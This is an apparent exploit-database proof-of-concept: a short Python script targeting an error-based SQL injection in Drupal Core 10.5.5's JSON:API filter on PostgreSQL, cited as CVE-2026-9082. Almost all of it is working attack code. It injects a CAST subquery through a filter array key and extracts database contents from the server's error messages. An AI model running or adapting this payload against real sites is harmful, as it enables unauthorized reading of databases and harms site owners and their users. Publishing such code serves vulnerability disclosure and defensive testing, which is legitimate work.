# Exploit Title: Drupal Core 10.5.5 - Error-Based SQL Injection
# Google Dork: N/A
# Date: 2026-05-31
# Exploit Author: cardosource
# Vendor Homepage: https://www.drupal.org
# Software Link: https://www.drupal.org/project/drupal
# Version: Drupal Core 10.5.5
# Tested on: Debian Linux (Docker), PHP 8.2, Apache, PostgreSQL 17
# CVE: CVE-2026-9082
#
# Description:
# This proof-of-concept demonstrates an Error-Based SQL Injection in
# Drupal Core 10.5.5 (PostgreSQL). User-controlled JSON:API filter
# array keys influence SQL query construction, allowing database
# information disclosure through SQL error messages.
import requests
import json
from urllib.parse import urlencode
TARGET_URL = "http://localhost:8080/jsonapi/node/article"
BANNER = """
[+] Drupal Core 10.5.5 - Error-Based SQL Injection
[+] CVE-2026-9082
[+] Target: JSON:API (PostgreSQL)
"""
def extract_data(subquery):
headers = {
"Accept": "application/vnd.api+json",
"Content-Type": "application/vnd.api+json"
}
payload = f"0||CAST(({subquery}) AS INTEGER)"
params = {
"filter[my_filter][condition][path]": "title",
"filter[my_filter][condition][operator]": "IN",
"filter[my_filter][condition][value][0]": "Example",
f"filter[my_filter][condition][value][{payload}]": "Injection"
}
try:
response = requests.get(TARGET_URL, headers=headers, params=params, timeout=10)
if response.status_code == 500:
try:
error = response.json().get("errors", [{}])[0].get("detail", "")
if "invalid input syntax" in error:
data = error.split('"')[1] if '"' in error else error
print(f"\033[92m[SUCCESS]\033[0m {data}")
except json.JSONDecodeError:
pass
except requests.exceptions.RequestException:
pass
if __name__ == "__main__":
print(BANNER)
extract_data("SELECT version()")
